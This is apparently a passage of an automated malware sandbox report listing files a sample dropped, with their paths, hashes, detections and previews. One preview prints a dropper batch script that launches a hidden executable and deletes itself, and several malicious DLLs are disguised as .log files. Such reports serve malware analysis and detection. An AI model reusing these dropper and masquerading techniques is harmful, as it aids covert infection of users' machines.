                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\UxjvufkBGw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98304
                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\W1Hs0e5ZOi

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):250
                                                                                                                          Entropy (8bit):5.3431587844206545
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hCijTg3Nou1SV+DER5/edlQAO43kDvKOZG1wkn23fv0oRH:HTg9uYDEf/I0pfUG
                                                                                                                          MD5:D1EA88A082DB764DFB8A6F9B6FD5410F
                                                                                                                          SHA1:B11F7D9C1CF4074578BC245B488D8B1A56936FC3
                                                                                                                          SHA-256:B09010FBA6E7992CB3DDE62B11D71269E1FF3F4DD13C10B80B1AB9B1EFCEDBBA
                                                                                                                          SHA-512:2137DD969DA82B095406C1C1D36E0D5EAD3880DBB919449C4B315F14A0C34A71E01BCA7A19FD0D9A756D574896ADC55B333202C2DF4B4A28F6443B1E7E97FCCC
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\WGIlBCoJLj.bat"

                                                                                                                          C:\Users\user\AppData\Local\Temp\azC4YcApEz

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):25
                                                                                                                          Entropy (8bit):4.243856189774724
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:DVk2bNTSZK:lYK
                                                                                                                          MD5:1AC6741316960BF675D6E756F21AA310
                                                                                                                          SHA1:177B065DB050DF9078790B31CB7200DF46370B0B
                                                                                                                          SHA-256:EE8208898BE2DAF25B25FF4133658A230E604D09A9AA3065A01E9D691FF43BDF
                                                                                                                          SHA-512:674EC768A5261F5F4206A2A6DFAB0F355C1FABB2A70D2065531958258EDB8A3C919B64E61397B7E41BD13484570EED8BDA28ACA8E542AD645436BD8A83404612
                                                                                                                          Malicious:false
                                                                                                                          Preview:9Z1bOK8xi459WVNRhCAVx17Oo

                                                                                                                          C:\Users\user\AppData\Local\Temp\fV8fWeo1SO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\jYorNtQzim

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\pH8xC0x1BZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qxGL6Viu8G

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\YEfCwsuO.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                          • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                                          • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                          • Filename: aimware.exe, Detection: malicious, Browse
                                                                                                                          • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                                          • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                                          • Filename: tBnELFfQoe.exe, Detection: malicious, Browse
                                                                                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 67VB5TS184.exe, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                          C:\Users\user\Desktop\a5826fc1e993bf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):223
                                                                                                                          Entropy (8bit):5.736222367295656
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QKyIpOQFhyqYn1ZCj8dj4co933L1NEuqwHZEdOV2xaULHepWs:fyIp9Ul1ZCAmH5FEMV2xBHup
                                                                                                                          MD5:AAA2A979284A087DB996E5E4C67087D3
                                                                                                                          SHA1:DB497F90D9A10E2028896C18A45CCBD70853C11A
                                                                                                                          SHA-256:2B4466D46946B65823CB2C1678179A794BA8B38394B815A83974EC823D0B707C
                                                                                                                          SHA-512:F3EA6E66128EB6195587E643DEE1627C4F39513FE26C1C79A3707F0BF21C34F40F97FE0F7CA3A6615EAA9CCBC3E5F0090016B8E123B25B64C52FB7941882B5B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:BJuHoWILLkHwZDTjD8YiveHjH6deSZQA1lpnRbx2xD7zq4mxcPExu7bhBK9r3o2wTG5xYpRlKgushR2MTpBDVcQ4KImHbG8JKKfk9yZw7cmOMt9tRxXOmzb00BnQDKKEilhWwSMeQOG20CrbI20ostgVtou8LItxShplLn78k28XtiAxTMILTfWyFLmHiOTHfSkSWFPe41DzvImLn6o89hdwL1g9Bza

                                                                                                                          C:\Users\user\Desktop\bGmawssa.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32256
                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\cDNiSsHV.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23552
                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\mmgyBVMD.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                          C:\Users\user\Desktop\oGlGPwkc.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):85504
                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                          C:\Users\user\Desktop\tbIFYUNW.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32256
                                                                                                                          Entropy (8bit):5.631194486392901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\wJkgsuUR.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23552
                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\wVAOlxRk.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):85504
                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                          C:\Windows\LiveKernelReports\7ccfebd9e92364

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with very long lines (712), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):712
                                                                                                                          Entropy (8bit):5.88043202745134
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:a1pcmazHQxfZ/h5h4mnpcV9tF6g2b8Uf9PAG5/jPxv3OmEOq/bm4/8:arxdxRZU0pQ6g2Xl46V2DOqCg8
                                                                                                                          MD5:0CAA6146F197B8617EB43A8D01E2EAC4
                                                                                                                          SHA1:1B46FDDE5555C411EEC0C7C00C20BC3B5E8FE80D
                                                                                                                          SHA-256:6FADEEC66BC86363B63F468317A09708DA2622E3EF6125F67A800399A3EAB9C3
                                                                                                                          SHA-512:0F6BDDD763875F0386EB3EE342677D89AE08B70EA96693B4D3E91C2C261F41C31AC0FBDE838245460F3812CE962EB4349B22062F7DB05C6AB7D2D6B5C06E9F9E
                                                                                                                          Malicious:false
